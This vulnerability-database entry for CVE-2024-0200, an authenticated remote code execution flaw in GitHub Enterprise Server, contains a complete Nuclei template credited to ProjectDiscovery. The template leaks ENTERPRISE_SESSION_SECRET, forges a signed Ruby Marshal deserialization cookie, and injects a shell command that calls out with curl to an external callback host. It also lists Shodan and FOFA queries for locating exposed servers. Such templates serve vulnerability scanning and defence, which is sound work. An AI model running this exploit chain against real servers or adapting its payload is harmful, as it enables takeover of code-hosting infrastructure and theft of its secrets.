Github Enterprise Authenticated Remote Code Execution

2024-05-0911:09:50

ProjectDiscovery

github.com

cve-2024

reflection injection

user-controlled methods

remote code execution

ghes

organization owner role

github enterprise.

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

Confidence

High

EPSS

0.059

Percentile

93.5%

JSON

An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.

id: CVE-2024-0200

info:
  name: Github Enterprise Authenticated Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    An unsafe reflection vulnerability was identified in GitHub Enterprise Server that could lead to reflection injection. This vulnerability could lead to the execution of user-controlled methods and remote code execution. To exploit this bug, an actor would need to be logged into an account on the GHES instance with the organization owner role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.8.13, 3.9.8, 3.10.5, and 3.11.3.
  reference:
    - https://starlabs.sg/blog/2024/04-sending-myself-github-com-environment-variables-and-ghes-shell/
    - https://blog.convisoappsec.com/en/analysis-of-github-enterprise-vulnerabilities-cve-2024-0507-cve-2024-0200/
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.10.5
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.11.3
    - https://docs.github.com/en/[email protected]/admin/release-notes#3.8.13
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0200
    cwe-id: CWE-470
    epss-score: 0.06844
    epss-percentile: 0.93885
    cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: github
    product: "enterprise_server"
    shodan-query:
      - "title:\"GitHub Enterprise\""
      - micro focus dsd
    fofa-query: "app=\"Github-Enterprise\""
  tags: cve,cve2024,rce,github,enterprise
variables:
  username: "{{username}}"
  password: "{{password}}"
  oast: "curl {{interactsh-url}}/?"
  padstr: "{{randstr}}"
  payload: '{{padding(oast,padstr,300)}}'
  marshal_data: '%04%08o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy%09:%0e@instanceo:%1dAqueduct::Worker::Worker%07:%0b@childI"%026%0199999999; {{payload}}%06:%06ET:%0c@loggero:%0bLogger%00:%0c@method:%0fkill_child:%09@varI"%10@kill_child%06;%09T:%10@deprecatoro:%1fActiveSupport::Deprecation%06:%0e@silencedT'
  b64_marshal_data: "{{base64(url_decode(marshal_data))}}"
  digest: "{{ (hmac('sha1',b64_marshal_data,ghe_secret)) }}"
  final_payoad: "{{ b64_marshal_data + '--' + digest}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/v3/user/orgs"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    extractors:
      - type: json
        part: body
        name: org_name
        internal: true
        json:
          - ".[].login"

  - method: GET
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/memberships/{{username}}"
    headers:
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"role": "admin"'
        part: body

  - method: POST
    path:
      - "{{BaseURL}}/api/v3/orgs/{{org_name}}/repos"
    headers:
      Content-Type: application/json
      Authorization: "Basic {{base64('{{username}}' + ':' + '{{password}}')}}"
    body: |
          {
            "name": "{{randstr}}"
          }
    matchers:
      - type: status
        status:
          - 201

  - method: GET
    cookie-reuse: true
    path:
      - "{{BaseURL}}/login"
    extractors:
      - type: regex
        part: body
        internal: true
        group: 1
        regex:
          - 'name="authenticity_token" value="(.*?)"'
        name: csrf_token

  - method: POST
    path:
      - "{{BaseURL}}/session"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: |
      login={{username}}&password={{password}}&commit=Sign%20in&authenticity_token={{csrf_token}}&
    matchers:
      - type: status
        status:
          - 302
      - type: word
        words:
          - "_gh_render"
        part: header

  - method: GET
    path:
      - "{{BaseURL}}/organizations/{{org_name}}/settings/actions/repository_items?page=1&rid_key=nw_fsck"
    extractors:
      - type: regex
        group: 1
        name: ghe_secret
        internal: true
        regex:
          - '&quot;ENTERPRISE_SESSION_SECRET&quot;=&gt;&quot;([^"]+?)&quot;'
        part: body
    matchers:
      - type: word
        words:
          - 'ENTERPRISE_SESSION_SECRET'
        part: body

  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      Cookie: _gh_render={{final_payoad}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
# digest: 4a0a00473045022100b55f6b1a271d5853e4388a493b7db6672febea3697dcd0649fbaf6c2538dcefc02201397c08ed2ecd60f4aac71bcf61b1f0b7e66f84146464a70ec4d9f7584e5725b:922c64590222798bb761d5b6d8e72950